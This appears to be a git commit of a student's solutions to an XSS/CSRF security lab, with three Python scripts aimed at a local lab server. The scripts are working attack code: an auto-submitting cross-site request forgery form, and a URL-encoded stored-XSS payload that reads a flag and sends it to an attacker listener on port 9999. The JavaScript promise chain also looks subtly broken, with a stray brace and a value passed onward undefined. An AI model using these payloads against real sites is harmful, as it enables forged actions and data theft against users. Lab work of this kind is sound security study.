lab 5c - xss/csrf, completed

2026-01-25 08:24:05 +00:00 · 2024-12-09 16:54:27 -07:00
parent 7195de9287
commit 0fc29f2460
4 changed files with 119 additions and 0 deletions
--- a/5c/lab5c_3.py
+++ b/5c/lab5c_3.py
@@ -0,0 +1,9 @@
+from flask import Flask, redirect
+
+app = Flask("pwnc")
+
+@app.route("/")
+def hello():
+    return redirect("http://lab.localhost/showme")
+
+app.run("attacker.localhost", 9999)
--- a/5c/lab5c_4.py
+++ b/5c/lab5c_4.py
@@ -0,0 +1,20 @@
+from flask import Flask, render_template_string
+
+app = Flask("pwnc")
+
+
+@app.route("/")
+def hello():
+    # auto-submit on page load
+    html_form = """<html>
+    <body onload="document.getElementById('leakForm').submit();">
+        <form id="leakForm" action="http://lab.localhost/getpower" method="POST">
+            <input type="hidden" name="powernum" id="powernum" value=1337>
+        </form>
+    </body>
+</html>
+"""
+    return render_template_string(html_form)
+
+
+app.run("attacker.localhost", 9999)
--- a/5c/lab5c_6.py
+++ b/5c/lab5c_6.py
@@ -0,0 +1,31 @@
+import requests
+
+echo_string = """
+<script>
+    fetch(`http://lab.localhost/setflag`, {
+        method: 'POST',
+        body: new URLSearchParams({
+            "secretpass": "guessmeseeyoucant"
+        })
+    })
+    .then(resp => {
+        fetch(`http://lab.localhost/getflag`)
+    })
+    .then(resp2 => {
+        return resp2.text();
+    })
+        .then(text => {
+            fetch(`http://lab.localhost:9999/hi=${text}`)
+        })
+    })
+</script>
+"""
+encode_1 = requests.utils.quote(echo_string)
+
+# store the XSS script in server
+middle_url = f"http://lab.localhost/addpost?ptext={encode_1}"
+encode_2 = requests.utils.quote(middle_url)
+
+final_url = f"http://lab.localhost/go?gourl={encode_2}"
+
+requests.get(final_url)